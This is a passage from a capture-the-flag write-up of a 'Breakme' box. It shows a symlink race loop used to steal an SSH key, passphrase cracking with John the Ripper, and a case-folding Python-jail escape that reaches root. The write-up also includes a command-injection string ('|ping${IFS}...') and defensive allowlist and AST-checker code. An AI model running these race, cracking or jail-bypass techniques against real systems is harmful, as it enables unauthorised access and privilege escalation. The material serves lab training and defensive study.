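    """Allowlist the target and return an argv list: the metacharacters the
    page relies on ('|', '${IFS}') can never satisfy the pattern, and the
    result is passed to subprocess.run(argv) without a shell."""
    s = user_input.strip()
    if not _IPV4.fullmatch(s):
        raise ValueError(f"target rejected: {user_input!r}")
    ip = ipaddress.IPv4Address(s)          # also rejects octets above 255
    return ["ping", "-c", "1", "-W", "1", str(ip)]


def safe_user_exists(user_input: str) -> bool:
    """Allowlist the name and consult the passwd database directly instead
    of shelling out to `id <name>`."""
    if not _USERNAME.fullmatch(user_input):
        raise ValueError(f"username rejected: {user_input!r}")
    try:
        pwd.getpwnam(user_input)
        return True
    except KeyError:
        return False


def rejects(check, value) -> bool:
    """True if the validator refuses the value; used to exercise the cases."""
    try:
        check(value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # The blocklist leaves the page's payload intact...
    print(filtered_ping_command("|ping${IFS}10.17.15.155"))
    # ...while the allowlist refuses it and accepts only a bare address.
    print(rejects(safe_ping_argv, "|ping${IFS}10.17.15.155"))
    print(safe_ping_argv("10.17.15.155"))
```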
Reverse Shell as Youcef
In the home directory of youcef we find that we have access to other files, including readfile.
We want to take a closer look at the files and set up a python web server in the home directory to access these.
Initially, we decompile the readfile binary since we lack access to readfile.c. This binary has the SUID bit set, allowing us to read files with the privileges of its owner, Youcef. We hope to retrieve Youcef's SSH key. However, attempts to read the file result in a "file not found" error, and our access to readfile.c returns a Nice Try! message, indicating restrictions in place.
After decompiling the binary, we discover that it checks that the caller is john by comparing the UID. It also refuses specific filenames such as flag and id_rsa, printing a Nice Try! message if those are attempted. Additionally, the program checks for symlinks, which also fail if opened, as do any files that user john cannot access.
The application first checks if an argument is supplied, otherwise it exits with a usage message. It then verifies if the file exists, exits if it doesn't, and ensures the user is running with UID 1002 (john). If the filename contains flag or id_rsa, or is a symlink, access is denied. However, if the file passes these checks, the program waits briefly (usleep) before opening and printing the file. This delay introduces a race condition, allowing exploitation between the file check and access (TOCTOU vulnerability).
Race Condition
To exploit the race condition, we create a regular file and rapidly toggle it between a regular file and a symlink pointing to the file we want (e.g., youcef's SSH key). The goal is that the application's check sees the regular file and allows access, but by the time the program opens and reads the file, the symlink points to the target file, bypassing the restrictions.
First, we run a loop in the background that constantly switches the file between these two states.
while true; do ln -sf /home/youcef/.ssh/id_rsa symlink; rm symlink; touch symlink; done &
Now, we will create another loop that continuously runs the program, hoping to win the race condition. If we succeed, it will print the output and exit.
for i in {1..30}; do /home/youcef/readfile symlink; done
As we can see, after a while, we win the race and manage to read /home/youcef/.ssh/id_rsa.
SSH Connection
Now that we have the SSH key, we hit an additional obstacle: the key is encrypted with a passphrase. To use it and establish a shell on the target, we need to crack or bypass that passphrase.
┌──(kali㉿kali)-[~/Desktop/Transfer]
└─$ ssh -i id_rsa youcef@breakme.thm
Enter passphrase for key 'id_rsa':
We can attempt to brute-force the passphrase. First, we need to convert the SSH key into a format that John the Ripper can work with.
$ ssh2john id_rsa > ssh_key.hash
The ssh2john utility transforms the private key into a hash format that John the Ripper recognizes. After converting the key, we run John against it with a wordlist and obtain the passphrase.
┌──(kali㉿kali)-[~/Desktop/Transfer]
└─$ john ssh_key.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:06 0.00% (ETA: 2024-10-10 21:56) 0g/s 53.50p/s 53.50c/s 53.50C/s cancer..michael1
[REDACTED] (id_rsa)
1g 0:00:00:12 DONE (2024-10-07 16:28) 0.07782g/s 52.29p/s 52.29c/s 52.29C/s gracie..kelly
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Using the SSH key and the cracked passphrase, we log in as the user "youcef." With this shell we can read files and run commands as youcef, explore the system further, and locate the second flag.
┌──(kali㉿kali)-[~/Desktop/Transfer]
└─$ ssh -i id_rsa youcef@breakme.thm
Enter passphrase for key 'id_rsa':
Linux Breakme 5.10.0-8-amd64 #1 SMP Debian 5.10.46-4 (2021-08-03) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Mar 21 07:55:16 2024 from 192.168.56.1
youcef@Breakme:~$ id
uid=1000(youcef) gid=1000(youcef) groups=1000(youcef)
This gives us our second flag.
Privilege Escalation
youcef@Breakme:~$ sudo -l
Matching Defaults entries for youcef on breakme:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User youcef may run the following commands on breakme:
(root) NOPASSWD: /usr/bin/python3 /root/jail.py
Executing the program reveals that we are operating within a Python jail, which prompts us for input.
youcef@Breakme:~$ sudo /usr/bin/python3 /root/jail.py
Welcome to Python jail
Will you stay locked forever
Or will you BreakMe
>>
Upon testing the input, we discover that entering invalid Python code triggers a "Wrong Input" message.
youcef@Breakme:~$ sudo /usr/bin/python3 /root/jail.py
Welcome to Python jail
Will you stay locked forever
Or will you BreakMe
>> test
Wrong Input
>>
When we input valid Python code, it executes successfully, indicating that our input is likely being passed directly to the exec function.
youcef@Breakme:~$ sudo /usr/bin/python3 /root/jail.py
Welcome to Python jail
Will you stay locked forever
Or will you BreakMe
>> test
Wrong Input
>> print(hello)
Wrong Input
>> print('hello')
hello
>>
However, if we try to import a module to run commands, we see the message Illegal Input and the program exits. This indicates that there must be some filtering in place.
>> import os
Illegal Input
youcef@Breakme:~$
Since importing a module to spawn a shell is blocked, we need to find out exactly what the filter rejects and look for another path to command execution.
Looking for common Python jail bypass payloads, we find the following one, which imports the os module and calls its system function:
__builtins__.__import__("os").system("ls")
In our case, however, it fails. Testing its first part, __builtins__.__import__, shows that this access is already restricted.
>> __builtins__.__import__
Illegal Input
By breaking the payload down and testing its individual components, we determine that the filter rejects the __import__ function and double quotation marks.
To get around the quotation marks, we can use single quotes (').
For __import__, instead of calling it directly as __builtins__.__import__, we can reach it through the dictionary with __builtins__.__dict__['__import__'].
This approach lets us supply __import__ as a string, which we can build with string methods to circumvent the filter. For instance, the application has no issue with __IMPORT__, which we can then convert to __import__.
>> __IMPORT__
Wrong Input
We can use __IMPORT__ and then apply a method that converts it to __import__. One candidate is lower(), which transforms all uppercase letters into lowercase.
Looking for alternatives to the lower method, we find the casefold method, which serves the same purpose. As we can see, this method is not filtered and works.
>> print(__builtins__.__dict__['__IMPORT__'.casefold()])
<built-in function __import__>
Returning to our payload, we find that when we attempt to import the os module, it is also not allowed, and we can see the reason why: os is filtered as well.
>> __builtins__.__dict__['__IMPORT__'.casefold()]('os')
Illegal Input
>> os
Illegal Input
Since os is already supplied as a string and OS is not filtered, we can use the casefold method once more to bypass it.
As we can see, this works, and we are able to access the os module.
>> print(__builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()))
<module 'os' from '/usr/lib/python3.9/os.py'>
Accessing the system function directly fails in the same way. Using __dict__ once more lets us supply system as a string and apply casefold to bypass the filter, and as we can see, this gives us the system function.
>> print(__builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()).__dict__['SYSTEM'.casefold()])
<built-in function system>
Passing '/lib/yorick/bin/yorick' to this system function, i.e. the payload __builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()).__dict__['SYSTEM'.casefold()]('/lib/yorick/bin/yorick'), spawns the Yorick interpreter as root. Inside Yorick, the command system, "bash" launches a shell as the root user, which lets us read the third flag.
youcef@Breakme:~$ sudo /usr/bin/python3 /root/jail.py
Welcome to Python jail
Will you stay locked forever
Or will you BreakMe
>> __builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()).__dict__['SYSTEM'.casefold()]('/lib/yorick/bin/yorick')
Copyright (c) 2005. The Regents of the University of California.
All rights reserved. Yorick 2.2.04 ready. For help type 'help'
> system, "bash"
root@Breakme:/home/youcef# cd ~
root@Breakme:~# id
uid=0(root) gid=0(root) groups=0(root)
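The jail fails for a structural reason, not because one word was missing from its list: a substring deny-list looks at the text of the input, while the code that matters is built at runtime from strings the filter has already approved. As an added example, not the challenge's jail.py (whose source we never see), here is a checker that inspects the parsed AST instead and allows only an explicit set of constructs: no import statements, no identifiers or attributes that start with an underscore, and calls only to a fixed set of names or to attributes (so 'OS'.casefold() alone is harmless, but nothing it produces can ever be called). The class, the allow-list contents and the check function are mine. Even this is not a sandbox; the root cause in the challenge is exec of user input under sudo as root, and no input filter changes that.

```python
import ast

# Names that may be called directly. Anything reaching a callable by another
# route (an alias, a subscript, a returned value) is refused as a call.
ALLOWED_CALLS = {"print", "len", "str", "int", "abs", "min", "max", "sorted", "range"}
# Attribute names that do not start with '_' but still reach object internals.
DENIED_ATTRS = {"format", "format_map", "mro"}

class Rejected(Exception):
    pass

class JailChecker(ast.NodeVisitor):
    """Allow-list walk over the syntax tree of the submitted code."""

    def _deny(self, node, why):
        raise Rejected(f"line {node.lineno}: {why}")

    def visit_Import(self, node):
        self._deny(node, "import statement")

    def visit_ImportFrom(self, node):
        self._deny(node, "import statement")

    def visit_Name(self, node):
        # Catches __builtins__, __IMPORT__, _anything regardless of case games.
        if node.id.startswith("_"):
            self._deny(node, f"underscore name {node.id}")
        self.generic_visit(node)

    def visit_Attribute(self, node):
        # Catches .__dict__, .__class__, .__subclasses__ and .format.
        if node.attr.startswith("_") or node.attr in DENIED_ATTRS:
            self._deny(node, f"attribute {node.attr}")
        self.generic_visit(node)

    def visit_Call(self, node):
        fn = node.func
        if isinstance(fn, ast.Name):
            if fn.id not in ALLOWED_CALLS:
                self._deny(node, f"call to {fn.id}")
        elif not isinstance(fn, ast.Attribute):
            # d['x'](), f()(), (lambda: g)()(): the callee was computed, refuse.
            self._deny(node, "call through a computed expression")
        self.generic_visit(node)  # still checks the callee's attribute and args

def check(src: str):
    """Return (allowed, reason) for one line of submitted code."""
    try:
        tree = ast.parse(src, mode="exec")
    except SyntaxError as e:
        return False, f"syntax error: {e.msg}"
    try:
        JailChecker().visit(tree)
    except Rejected as e:
        return False, str(e)
    return True, "ok"

if __name__ == "__main__":
    # Constructed inputs: the ones typed into the jail above, plus an alias trick.
    samples = [
        "print('hello')",
        "import os",
        "__IMPORT__",
        "__builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold())",
        "x = getattr\nx(print, 'name')",
    ]
    for s in samples:
        print(f"{s!r:70} -> {check(s)}")
```

The page's final payload is refused at its very first token, __builtins__, and it would still be refused if every string inside it were spelled differently, because the decision is made on the tree's structure rather than on the characters the filter happens to know about.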